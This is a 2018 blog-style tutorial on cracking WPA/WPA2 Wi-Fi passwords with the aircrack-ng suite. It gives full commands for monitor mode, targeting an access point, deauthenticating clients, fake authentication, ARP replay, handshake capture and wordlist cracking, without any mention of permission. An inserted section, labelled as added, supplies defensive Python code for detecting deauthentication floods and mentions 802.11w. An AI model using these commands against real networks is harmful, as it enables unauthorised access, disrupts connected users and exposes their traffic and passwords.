Monday 19 November 2018

How To Hack Wifi Networks To Get Passwords

WPA/WPA2 Attack Using Aircrack, with data capture


In this attack we capture data wirelessly while a client authenticates to the router, then run a wordlist against the captured data until the password is found.

We begin by putting the wireless adapter into monitor mode:
        airmon-ng start wlan0

To list any nearby routers/APs and client devices, run:
        airodump-ng --uptime --manufacturer -a wlan0mon

where:
  • --uptime shows how long each device has been up.
  • --manufacturer shows the manufacturer of each displayed device.
  • -a hides any "not associated" clients, e.g. devices that are on mobile data or that keep trying to join a router without the right password. Omit -a if you want to see those devices/clients too.

In the Aircrack-ng suite of tools, the word station, which you'll see in your scan results, refers to the clients or users of that Wi-Fi router/Access Point (AP).

Once you have identified the target Access Point, you can narrow the scan down to it with:
        airodump-ng [--essid <essid>] [--bssid <bssid>] --wps --uptime --manufacturer --showack -a wlan0mon

(Figure: scanned APs)

You can use --essid or --bssid, or both.

where:

  • --essid is the name of the Wi-Fi router/Access Point.
  • --bssid is the MAC address of the AP.
  • --wps shows any available WPS information.
  • --showack shows ACK/CTS/RTS statistics for the device.

We now set our adapter to capture data from the selected AP only:
        airodump-ng -c <channel> --bssid <BSSID of AP> -w <filename (handshake file)> wlan0mon

-w sets the path and base name of the file that will be created to store all captured data, including any captured handshakes.


Speeding Things Up
Speeding things up gets us more captured packets in less time, and the more packets we capture, the better our chances of cracking the password.

We can speed things up by deauthenticating clients connected to the AP, purely to get more handshakes and more captured data. We inject
deauthentication frames into the network to deauthenticate a specific client, or all clients, with aireplay-ng:
        aireplay-ng -0 5 -a <BSSID of AP> -c <MAC of client> wlan0mon

or
        aireplay-ng --deauth 5 -a <BSSID of AP> -c <MAC of client> wlan0mon

(Figure: deauthenticating everyone on the Wi-Fi network using 5 packets)

where:
  • -0 is the option meaning deauthentication; the long form is --deauth.
  • 5 is the number of deauthentication packets to send. Pick any number you like, or use 0 to send packets indefinitely.
  • -c is the client's MAC address; omit it to deauthenticate every client on the AP.

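As an added, defensive example that is not part of the original post: a small detector (hypothetical code over constructed frame records, not a real capture) that flags the kind of deauthentication burst the commands above produce, by counting deauth/disassoc management frames per BSSID in a sliding time window and noting whether they were aimed at the broadcast address (i.e. at every client, the "-c omitted" case).

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample of already-parsed 802.11 management frames (not real data).
# Each tuple: (time_s, subtype, bssid, destination).
# Subtype 8 = beacon (benign), 10 = disassociation, 12 = deauthentication.
SAMPLE_FRAMES = [
    (0.00, 8, "00:11:22:33:44:55", BROADCAST),            # beacon
    (0.10, 8, "00:11:22:33:44:55", BROADCAST),            # beacon
    (0.50, 12, "00:11:22:33:44:55", BROADCAST),           # burst of deauths to everyone
    (0.52, 12, "00:11:22:33:44:55", BROADCAST),
    (0.54, 12, "00:11:22:33:44:55", BROADCAST),
    (0.56, 12, "00:11:22:33:44:55", BROADCAST),
    (0.58, 12, "00:11:22:33:44:55", BROADCAST),
    (30.0, 12, "66:77:88:99:aa:bb", "de:ad:be:ef:00:01"), # one isolated, normal deauth
]


def detect_deauth_floods(frames, window_s=2.0, threshold=4):
    """Return one alert per BSSID that emits >= threshold deauth/disassoc
    frames within any window_s-second window.

    frames: iterable of (time_s, subtype, bssid, dst), sorted by time_s.
    Thresholds are illustrative; tune them to the baseline of your own WLAN.
    """
    recent = defaultdict(deque)   # bssid -> timestamps still inside the window
    alerted = set()
    alerts = []
    for t, subtype, bssid, dst in frames:
        if subtype not in (10, 12):   # only disassociation / deauthentication
            continue
        q = recent[bssid]
        q.append(t)
        while q and t - q[0] > window_s:   # slide the window forward
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({
                "bssid": bssid,
                "count": len(q),
                "window_start": q[0],
                "broadcast": dst == BROADCAST,   # aimed at every client at once
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_deauth_floods(SAMPLE_FRAMES):
        print("deauth flood from", alert["bssid"], alert)
```

On a live network the records would come from a monitor-mode capture; a sustained stream of deauths from one BSSID with no matching client roaming is the signature to alert on. The mitigation on the network side is 802.11w (Protected Management Frames), under which clients discard forged deauthentication frames.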
You can also speed things up by attempting an association: aireplay-ng lets us perform a fake authentication with the AP.
        aireplay-ng -1 0 -a <BSSID of AP> -h <MAC address of your choice> -e <ESSID of your choice> wlan0mon

(Figure: a successful fake authentication attack on the Wi-Fi router)

where:
  • -1 is the option meaning fake authentication.
  • -h lets us supply a MAC address of our choice.

We can also capture and retransmit ARP requests sent by a client. --arpreplay (short form -3) is the standard ARP request replay attack option:
        aireplay-ng --arpreplay -b <BSSID> -h <chosen client MAC address> wlan0mon

or
        aireplay-ng -3 -b <BSSID> -h <chosen client MAC address> wlan0mon


Cracking The Password
We use airodump-ng to capture and save all traffic, and later use aircrack-ng together with a wordlist to crack the password. For better results, try to wait until more than 20,000 packets have been captured.
We capture and save the packets and handshakes into a file that we'll later use for cracking by running:
        airodump-ng --bssid <MAC of AP> -c <channel> -w <fileName> wlan0mon
You can also feed aircrack-ng IVS packets only.
To capture IVS packets only, run:
        airodump-ng --channel <channel> --bssid <BSSID of AP> -w <filename> --ivs wlan0mon


Optionally, we can take a quick look at the handshake in Wireshark:
        wireshark <fileName.cap>

Open the .cap files with Wireshark; that is the format the capture files above use to store the captured traffic.

(Figure: files created to store the captured traffic; note the file formats used)

After we've collected enough data packets, we can begin the actual cracking with:
        aircrack-ng -b <BSSID of AP> <handshake filename> -w <wordlist path>



For a WEP router, this could have been as simple as:
        aircrack-ng <fileName-01.cap>
 

For WPA/WPA2:
        aircrack-ng -b(BSSID) (handshake filename) -w (wordlist filename)
 

e.g.
        aircrack-ng -b 00:11:22:33:44:55 file-01.cap -w ./dict

For the wordlist, you can either build your own, sometimes with the help of crunch (handy, but be careful not to fill your hard drive when using it), or download one from the internet. Kali Linux ships a few wordlists in the directory /usr/share/wordlists.


From this point onwards, success in cracking the password depends entirely on the quality of your wordlist.
